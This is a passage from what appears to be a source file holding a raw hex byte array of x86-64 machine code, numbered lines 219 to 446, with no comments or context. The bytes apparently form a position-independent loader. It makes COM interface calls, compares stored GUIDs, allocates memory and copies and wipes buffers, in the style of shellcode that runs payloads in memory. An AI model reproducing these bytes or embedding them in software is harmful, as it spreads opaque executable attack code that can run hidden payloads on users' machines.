219 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x28, 0x00, 0x48, 0x8b, 0x4b,
220 0x20, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
221 0x48, 0x83, 0x63, 0x20, 0x00, 0x48, 0x8b, 0x4b, 0x18, 0x48, 0x85, 0xc9,
222 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x18,
223 0x00, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x85, 0xc9, 0x74, 0x15, 0x48, 0x8b,
224 0x01, 0xff, 0x50, 0x58, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x8b, 0x01, 0xff,
225 0x50, 0x10, 0x48, 0x83, 0x63, 0x10, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48,
226 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83,
227 0x63, 0x08, 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0x48,
228 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x23, 0x00, 0x48, 0x83, 0xc4,
229 0x20, 0x5b, 0xc3, 0xcc, 0xf0, 0xff, 0x41, 0x20, 0x8b, 0x41, 0x20, 0xc3,
230 0x48, 0x8b, 0x49, 0x10, 0x45, 0x8b, 0xd1, 0x4c, 0x8b, 0x4c, 0x24, 0x30,
231 0x49, 0x8b, 0xd0, 0x45, 0x8b, 0xc2, 0x48, 0x8b, 0x01, 0x48, 0xff, 0x60,
232 0x50, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83,
233 0xec, 0x20, 0x49, 0x8b, 0xd9, 0x48, 0x8b, 0xf9, 0x4d, 0x85, 0xc9, 0x75,
234 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x13, 0x48, 0x8b, 0x49, 0x10,
235 0x48, 0x8b, 0x01, 0xff, 0x50, 0x08, 0x48, 0x8b, 0x47, 0x10, 0x48, 0x89,
236 0x03, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48, 0x83, 0xc4, 0x20,
237 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x85, 0xd2, 0x75, 0x06, 0xb8, 0x03, 0x40,
238 0x00, 0x80, 0xc3, 0xc7, 0x02, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc3,
239 0x48, 0x83, 0xec, 0x48, 0x48, 0x8b, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00,
240 0x4c, 0x8b, 0xd9, 0x48, 0x8b, 0x49, 0x10, 0x44, 0x8b, 0xc2, 0x44, 0x0f,
241 0xb7, 0x4c, 0x24, 0x70, 0x49, 0x8b, 0xd3, 0x48, 0x89, 0x44, 0x24, 0x38,
242 0x48, 0x8b, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x11, 0x48,
243 0x89, 0x44, 0x24, 0x30, 0x48, 0x8b, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00,
244 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x44, 0x24, 0x78, 0x48, 0x89,
245 0x44, 0x24, 0x20, 0x41, 0xff, 0x52, 0x58, 0x48, 0x83, 0xc4, 0x48, 0xc3,
246 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48,
247 0x81, 0xec, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48, 0x8b, 0xf9,
248 0x48, 0x8d, 0x0d, 0x31, 0x02, 0x00, 0x00, 0x48, 0x8b, 0xda, 0x48, 0x89,
249 0x08, 0x48, 0x8d, 0x0d, 0x0c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
250 0x89, 0x48, 0x08, 0x48, 0x8d, 0x0d, 0xa6, 0x02, 0x00, 0x00, 0x48, 0x8b,
251 0x02, 0x48, 0x89, 0x48, 0x10, 0x48, 0x8d, 0x0d, 0x50, 0xff, 0xff, 0xff,
252 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x18, 0x48, 0x8d, 0x0d, 0x06, 0xff,
253 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x20, 0x48, 0x8d, 0x0d,
254 0xdc, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x28, 0x48,
255 0x8d, 0x0d, 0x3a, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48,
256 0x30, 0x48, 0x8d, 0x0d, 0xb4, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
257 0x89, 0x48, 0x38, 0x48, 0x8d, 0x0d, 0x3a, 0xf5, 0xff, 0xff, 0x48, 0x8b,
258 0x02, 0x48, 0x89, 0x48, 0x40, 0x48, 0x8d, 0x0d, 0x2c, 0xf5, 0xff, 0xff,
259 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x48, 0x48, 0x8d, 0x0d, 0x1e, 0xf5,
260 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x50, 0x48, 0x8d, 0x0d,
261 0x10, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x58, 0x48,
262 0x8d, 0x0d, 0x02, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48,
263 0x60, 0x48, 0x8d, 0x0d, 0xec, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48,
264 0x89, 0x48, 0x68, 0x48, 0x8d, 0x0d, 0xe6, 0xf4, 0xff, 0xff, 0x48, 0x8b,
265 0x02, 0x48, 0x89, 0x48, 0x70, 0x48, 0x8d, 0x0d, 0xd8, 0xf4, 0xff, 0xff,
266 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x78, 0x48, 0x8d, 0x0d, 0xca, 0xf4,
267 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x80, 0x00, 0x00, 0x00,
268 0x48, 0x8d, 0x0d, 0xb9, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89,
269 0x88, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xa8, 0xf4, 0xff, 0xff,
270 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d,
271 0x0d, 0x97, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x98,
272 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x86, 0xf4, 0xff, 0xff, 0x48, 0x8b,
273 0x02, 0x48, 0x89, 0x88, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x75,
274 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xa8, 0x00, 0x00,
275 0x00, 0x48, 0x8d, 0x0d, 0x64, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
276 0x89, 0x88, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x53, 0xf4, 0xff,
277 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48,
278 0x8d, 0x0d, 0x42, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88,
279 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x55, 0x01, 0x00, 0x00, 0x48,
280 0x8b, 0x02, 0x48, 0x89, 0x88, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x02,
281 0x48, 0x8d, 0x0d, 0x1d, 0xf4, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x28, 0x00,
282 0x01, 0x00, 0x00, 0x48, 0x89, 0x88, 0xd0, 0x00, 0x00, 0x00, 0x4c, 0x8d,
283 0x87, 0xe8, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48, 0x8d, 0x0d, 0xfd,
284 0xf3, 0xff, 0xff, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x88, 0xd8, 0x00,
285 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xeb, 0xf3, 0xff, 0xff, 0x48, 0x8b, 0x02,
286 0x48, 0x89, 0x88, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xda, 0xf3,
287 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xe8, 0x00, 0x00, 0x00,
288 0x48, 0x8d, 0x44, 0x24, 0x30, 0x83, 0x62, 0x20, 0x00, 0x33, 0xc9, 0x48,
289 0x89, 0x7a, 0x28, 0x33, 0xd2, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x57,
290 0x70, 0x48, 0x8d, 0x53, 0x08, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xff, 0x97,
291 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x15, 0x48, 0x8b, 0x4b, 0x08,
292 0x4c, 0x8d, 0x43, 0x10, 0x48, 0x8d, 0x97, 0x84, 0x06, 0x00, 0x00, 0x48,
293 0x8b, 0x01, 0xff, 0x50, 0x30, 0x4c, 0x8d, 0x9c, 0x24, 0x40, 0x02, 0x00,
294 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0xe3,
295 0x5f, 0xc3, 0xcc, 0xcc, 0x4c, 0x8b, 0xc9, 0x4d, 0x85, 0xc0, 0x75, 0x06,
296 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x48, 0x8b, 0x49, 0x28, 0x48, 0x8b,
297 0x81, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x48, 0x8b,
298 0x81, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x32, 0x48,
299 0x8b, 0x81, 0x04, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x48,
300 0x8b, 0x81, 0x0c, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x19,
301 0x48, 0x8b, 0x81, 0x84, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x13,
302 0x48, 0x8b, 0x81, 0x8c, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x75,
303 0x06, 0x4d, 0x89, 0x08, 0x33, 0xc0, 0xc3, 0x49, 0x83, 0x20, 0x00, 0xb8,
304 0x02, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28,
305 0x48, 0x8b, 0x49, 0x18, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0xba, 0xfd,
306 0xff, 0xff, 0xff, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x70, 0x33, 0xc0, 0x48,
307 0x83, 0xc4, 0x28, 0xc3, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x20,
308 0xff, 0xc8, 0xc3, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x48, 0x8b, 0x41, 0x28,
309 0x8b, 0xca, 0xff, 0x50, 0x68, 0x33, 0xc0, 0x48, 0x83, 0xc4, 0x28, 0xc3,
310 0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x81, 0xec, 0xa0, 0x00, 0x00,
311 0x00, 0x48, 0x8b, 0xfa, 0x48, 0x8d, 0x99, 0x6c, 0x04, 0x00, 0x00, 0x8a,
312 0x03, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x84, 0xc0, 0x74, 0x56, 0x48,
313 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0x48, 0x2b, 0xd3, 0x3c, 0x3b,
314 0x74, 0x1b, 0x49, 0x81, 0xf8, 0x80, 0x00, 0x00, 0x00, 0x7d, 0x12, 0x88,
315 0x04, 0x11, 0x41, 0xff, 0xc1, 0x48, 0xff, 0xc1, 0x49, 0xff, 0xc0, 0x8a,
316 0x01, 0x84, 0xc0, 0x75, 0xe1, 0x4d, 0x85, 0xc0, 0x74, 0x27, 0x49, 0x63,
317 0xc9, 0x48, 0x8b, 0xd7, 0x48, 0xff, 0xc1, 0x42, 0xc6, 0x44, 0x04, 0x20,
318 0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0xca, 0x1a,
319 0x00, 0x00, 0x85, 0xc0, 0x75, 0xa5, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
320 0x02, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x48,
321 0x81, 0xc4, 0xa0, 0x00, 0x00, 0x00, 0x5f, 0xc3, 0x40, 0x53, 0x48, 0x83,
322 0xec, 0x50, 0x33, 0xdb, 0x48, 0x8b, 0xc2, 0x4c, 0x8b, 0xc9, 0x48, 0x85,
323 0xd2, 0x74, 0x37, 0x44, 0x8d, 0x43, 0x30, 0x48, 0x8b, 0xc8, 0x48, 0x8d,
324 0x54, 0x24, 0x20, 0x41, 0xff, 0x51, 0x58, 0x83, 0xf8, 0x30, 0x75, 0x22,
325 0x81, 0x7c, 0x24, 0x40, 0x00, 0x10, 0x00, 0x00, 0x75, 0x14, 0x81, 0x7c,
326 0x24, 0x48, 0x00, 0x00, 0x02, 0x00, 0x75, 0x0a, 0x83, 0x7c, 0x24, 0x44,
327 0x04, 0x75, 0x03, 0x8d, 0x58, 0xd1, 0x8b, 0xc3, 0xeb, 0x02, 0x33, 0xc0,
328 0x48, 0x83, 0xc4, 0x50, 0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
329 0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56,
330 0x41, 0x57, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x89,
331 0x40, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xff, 0x41, 0x83, 0xcc,
332 0xff, 0x4d, 0x8b, 0xf0, 0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf1, 0xbf, 0x00,
333 0x01, 0x00, 0x00, 0x4d, 0x85, 0xc9, 0x0f, 0x84, 0xba, 0x00, 0x00, 0x00,
334 0x48, 0x8d, 0x91, 0x24, 0x06, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x14, 0x06,
335 0x00, 0x00, 0x41, 0xff, 0xd1, 0x85, 0xc0, 0x78, 0x7d, 0x48, 0x8d, 0x44,
336 0x24, 0x30, 0x89, 0x7c, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0x0c, 0x48, 0x89,
337 0x44, 0x24, 0x20, 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56,
338 0x70, 0x49, 0x8b, 0x0e, 0x49, 0x8d, 0x5e, 0x08, 0x4c, 0x8d, 0x86, 0x34,
339 0x06, 0x00, 0x00, 0x4c, 0x8b, 0xcb, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48,
340 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c, 0x48, 0x8b, 0x0b,
341 0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
342 0x50, 0x50, 0x85, 0xc0, 0x78, 0x33, 0x44, 0x39, 0xbc, 0x24, 0x60, 0x02,
343 0x00, 0x00, 0x74, 0x25, 0x48, 0x8b, 0x0b, 0x4d, 0x8d, 0x4e, 0x10, 0x4c,
344 0x8d, 0x86, 0x54, 0x06, 0x00, 0x00, 0x48, 0x8d, 0x96, 0x44, 0x06, 0x00,
345 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x08, 0x4c, 0x21, 0x3b,
346 0xeb, 0x03, 0x4d, 0x21, 0x3e, 0x85, 0xc0, 0x79, 0x30, 0x49, 0x8d, 0x46,
347 0x10, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0x54, 0x06, 0x00, 0x00, 0x48, 0x89,
348 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x86, 0x44, 0x06, 0x00, 0x00, 0x33, 0xc9,
349 0xff, 0x96, 0x38, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x79, 0x0b, 0x4d, 0x21,
350 0x7e, 0x10, 0x33, 0xc0, 0xe9, 0x23, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e,
351 0x10, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x0e,
352 0x01, 0x00, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x89, 0x7c, 0x24, 0x28,
353 0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
354 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70, 0x48, 0x8d,
355 0x4c, 0x24, 0x30, 0xff, 0x96, 0xd8, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e,
356 0x10, 0x4d, 0x8d, 0x4e, 0x18, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd0, 0x48,
357 0x8b, 0xf8, 0x4c, 0x8b, 0x11, 0x41, 0xff, 0x52, 0x60, 0x48, 0x8b, 0xcf,
358 0x8b, 0xd8, 0xff, 0x96, 0xe0, 0x00, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x88,
359 0xb9, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x18, 0x48, 0x8d, 0x96, 0x64,
360 0x06, 0x00, 0x00, 0x4d, 0x8d, 0x46, 0x20, 0x48, 0x8b, 0x01, 0xff, 0x10,
361 0x85, 0xc0, 0x0f, 0x88, 0x9d, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05,
362 0x00, 0x00, 0x4c, 0x8d, 0x84, 0x24, 0x78, 0x02, 0x00, 0x00, 0x44, 0x21,
363 0xbc, 0x24, 0x7c, 0x02, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0x89,
364 0x84, 0x24, 0x78, 0x02, 0x00, 0x00, 0x8d, 0x51, 0xf0, 0xff, 0x96, 0xa8,
365 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x74, 0x6a, 0x4c,
366 0x8b, 0x40, 0x10, 0x33, 0xd2, 0x39, 0x95, 0x24, 0x05, 0x00, 0x00, 0x76,
367 0x15, 0x8a, 0x84, 0x2a, 0x28, 0x05, 0x00, 0x00, 0x42, 0x88, 0x04, 0x02,
368 0xff, 0xc2, 0x3b, 0x95, 0x24, 0x05, 0x00, 0x00, 0x72, 0xeb, 0x49, 0x8b,
369 0x4e, 0x20, 0x4d, 0x8d, 0x46, 0x28, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0x01,
370 0xff, 0x90, 0x68, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x48, 0x8b, 0x43, 0x10,
371 0x41, 0x0f, 0x94, 0xc7, 0x33, 0xd2, 0x39, 0x95, 0x24, 0x05, 0x00, 0x00,
372 0x76, 0x16, 0xc6, 0x84, 0x2a, 0x28, 0x05, 0x00, 0x00, 0x00, 0xc6, 0x04,
373 0x02, 0x00, 0xff, 0xc2, 0x3b, 0x95, 0x24, 0x05, 0x00, 0x00, 0x72, 0xea,
374 0x48, 0x8b, 0xcb, 0xff, 0x96, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xc7,
375 0x4c, 0x8d, 0x9c, 0x24, 0x30, 0x02, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x38,
376 0x49, 0x8b, 0x6b, 0x40, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x41,
377 0x5c, 0x5f, 0x5e, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x20, 0x55, 0x56, 0x57,
378 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0x90,
379 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28, 0x48, 0x8b, 0xd9, 0x48, 0x8b,
380 0x51, 0x48, 0xe8, 0x59, 0x12, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48,
381 0x8b, 0xcb, 0x48, 0x8b, 0x53, 0x50, 0x4c, 0x8b, 0xe0, 0xe8, 0x46, 0x12,
382 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93,
383 0x88, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0xf8, 0xe8, 0x30, 0x12, 0x00, 0x00,
384 0x4c, 0x8b, 0xf0, 0x4d, 0x85, 0xe4, 0x74, 0x35, 0x4d, 0x85, 0xff, 0x74,
385 0x30, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x8b, 0x13, 0xbd, 0x04, 0x00, 0x00,
386 0x00, 0x44, 0x8b, 0xcd, 0x33, 0xc9, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00,
387 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x2c, 0x83,
388 0xbb, 0x30, 0x02, 0x00, 0x00, 0x02, 0x75, 0x05, 0x33, 0xc9, 0x41, 0xff,
389 0xd6, 0x83, 0xc8, 0xff, 0x48, 0x8b, 0x9c, 0x24, 0xe8, 0x01, 0x00, 0x00,
390 0x48, 0x81, 0xc4, 0x90, 0x01, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41,
391 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0xc3, 0x44, 0x8b, 0x03, 0x48, 0x8b,
392 0xd3, 0x48, 0x8b, 0xce, 0xe8, 0x1b, 0x17, 0x00, 0x00, 0x33, 0xd2, 0x48,
393 0x8d, 0x4c, 0x24, 0x40, 0x44, 0x8d, 0x42, 0x40, 0xe8, 0x2b, 0x17, 0x00,
394 0x00, 0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x41, 0xbd, 0x01, 0x00,
395 0x00, 0x00, 0x75, 0x3b, 0x44, 0x8b, 0x0e, 0x4c, 0x8d, 0x86, 0x40, 0x02,
396 0x00, 0x00, 0x41, 0x81, 0xe9, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x56,
397 0x14, 0x48, 0x8d, 0x4e, 0x04, 0xe8, 0x46, 0x13, 0x00, 0x00, 0x48, 0x8b,
398 0x56, 0x28, 0x48, 0x8d, 0x8e, 0xf0, 0x07, 0x00, 0x00, 0xe8, 0xee, 0x11,
399 0x00, 0x00, 0x48, 0x3b, 0x86, 0xf0, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x97,
400 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x46, 0x28, 0x48, 0x8b, 0xce, 0x48, 0x8b,
401 0x56, 0x30, 0xe8, 0x5d, 0x11, 0x00, 0x00, 0x48, 0x89, 0x46, 0x30, 0x48,
402 0x85, 0xc0, 0x0f, 0x84, 0x5d, 0xff, 0xff, 0xff, 0x48, 0x8d, 0x9e, 0x44,
403 0x02, 0x00, 0x00, 0x8a, 0x03, 0x33, 0xd2, 0x84, 0xc0, 0x74, 0x40, 0x33,
404 0xc9, 0x3c, 0x3b, 0x74, 0x1b, 0x81, 0xfa, 0x04, 0x01, 0x00, 0x00, 0x73,
405 0x13, 0x41, 0x03, 0xd5, 0x88, 0x84, 0x0c, 0x80, 0x00, 0x00, 0x00, 0x8b,
406 0xca, 0x8a, 0x04, 0x1a, 0x84, 0xc0, 0x75, 0xe1, 0x85, 0xd2, 0x74, 0x1b,
407 0x8d, 0x4a, 0x01, 0xc6, 0x84, 0x14, 0x80, 0x00, 0x00, 0x00, 0x00, 0x48,
408 0x03, 0xd9, 0x48, 0x8d, 0x8c, 0x24, 0x80, 0x00, 0x00, 0x00, 0xff, 0x56,
409 0x30, 0xeb, 0xb8, 0x41, 0x8b, 0xfd, 0x44, 0x39, 0xae, 0x40, 0x02, 0x00,
410 0x00, 0x76, 0x2c, 0x4c, 0x8b, 0x46, 0x28, 0x48, 0x8b, 0xce, 0x8b, 0xdf,
411 0x48, 0x8b, 0x54, 0xde, 0x30, 0xe8, 0xe2, 0x10, 0x00, 0x00, 0x48, 0x89,
412 0x44, 0xde, 0x30, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xfe, 0x01, 0x00, 0x00,
413 0x41, 0x03, 0xfd, 0x3b, 0xbe, 0x40, 0x02, 0x00, 0x00, 0x72, 0xd4, 0x8b,
414 0x86, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x19, 0x48, 0x8b,
415 0xce, 0xe8, 0x0e, 0xf2, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xd8, 0x01,
416 0x00, 0x00, 0x48, 0x8b, 0x9e, 0x20, 0x09, 0x00, 0x00, 0xeb, 0x1d, 0x83,
417 0xf8, 0x03, 0x0f, 0x84, 0xc6, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x9e, 0x20,
418 0x09, 0x00, 0x00, 0x41, 0x3b, 0xc5, 0x74, 0x08, 0x48, 0x8b, 0x9c, 0x24,
419 0xd0, 0x01, 0x00, 0x00, 0x44, 0x39, 0xae, 0x6c, 0x05, 0x00, 0x00, 0x74,
420 0x32, 0x48, 0x8b, 0xce, 0xe8, 0x9f, 0xef, 0xff, 0xff, 0x85, 0xc0, 0x75,
421 0x0d, 0x83, 0xbe, 0x6c, 0x05, 0x00, 0x00, 0x02, 0x0f, 0x84, 0x90, 0x01,
422 0x00, 0x00, 0x48, 0x8b, 0xce, 0xe8, 0x9e, 0xf0, 0xff, 0xff, 0x85, 0xc0,
423 0x75, 0x0d, 0x83, 0xbe, 0x6c, 0x05, 0x00, 0x00, 0x02, 0x0f, 0x84, 0x77,
424 0x01, 0x00, 0x00, 0x44, 0x39, 0x6b, 0x08, 0x0f, 0x84, 0x08, 0x01, 0x00,
425 0x00, 0x8b, 0x93, 0x24, 0x05, 0x00, 0x00, 0xbf, 0x30, 0x05, 0x00, 0x00,
426 0x48, 0x03, 0xd7, 0x44, 0x8b, 0xcd, 0x33, 0xc9, 0x41, 0xb8, 0x00, 0x30,
427 0x00, 0x00, 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xe8, 0x48, 0x85, 0xc0, 0x0f,
428 0x84, 0x45, 0x01, 0x00, 0x00, 0x44, 0x8b, 0xc7, 0x48, 0x8b, 0xd3, 0x48,
429 0x8b, 0xc8, 0xe8, 0x61, 0x15, 0x00, 0x00, 0x8b, 0x43, 0x08, 0x8d, 0x48,
430 0xfd, 0x83, 0xf9, 0x02, 0x76, 0x21, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0xbe,
431 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x28, 0x05, 0x00, 0x00, 0x48, 0x8d,
432 0x8b, 0x28, 0x05, 0x00, 0x00, 0xe8, 0xbe, 0x12, 0x00, 0x00, 0xe9, 0xa3,
433 0x00, 0x00, 0x00, 0x0f, 0xb7, 0xc8, 0x4c, 0x8d, 0x84, 0x24, 0xd8, 0x01,
434 0x00, 0x00, 0x66, 0x41, 0x2b, 0xcd, 0x48, 0x8d, 0x94, 0x24, 0xd0, 0x01,
435 0x00, 0x00, 0xb8, 0x00, 0x01, 0x00, 0x00, 0x66, 0x0b, 0xc8, 0xff, 0x96,
436 0x98, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xde, 0x00, 0x00, 0x00,
437 0x8b, 0x94, 0x24, 0xd0, 0x01, 0x00, 0x00, 0x44, 0x8d, 0x48, 0x04, 0x33,
438 0xc9, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0x41, 0xff, 0xd4, 0x44, 0x8b,
439 0x83, 0x20, 0x05, 0x00, 0x00, 0x4c, 0x8d, 0x8b, 0x28, 0x05, 0x00, 0x00,
440 0x0f, 0xb7, 0x4b, 0x08, 0x48, 0x8d, 0x95, 0x28, 0x05, 0x00, 0x00, 0x48,
441 0x8b, 0xf8, 0x66, 0x41, 0x2b, 0xcd, 0xb8, 0x00, 0x01, 0x00, 0x00, 0x48,
442 0x89, 0x7c, 0x24, 0x30, 0x66, 0x0b, 0xc8, 0x48, 0x8d, 0x84, 0x24, 0xe0,
443 0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x28, 0x44, 0x89, 0x44, 0x24,
444 0x20, 0x44, 0x8b, 0x83, 0x24, 0x05, 0x00, 0x00, 0xff, 0x96, 0xa0, 0x01,
445 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x48, 0x8b,
446 0xcf, 0x8b, 0xd8, 0x41, 0xff, 0xd7, 0x85, 0xdb, 0x75, 0x68, 0x48, 0x8b,
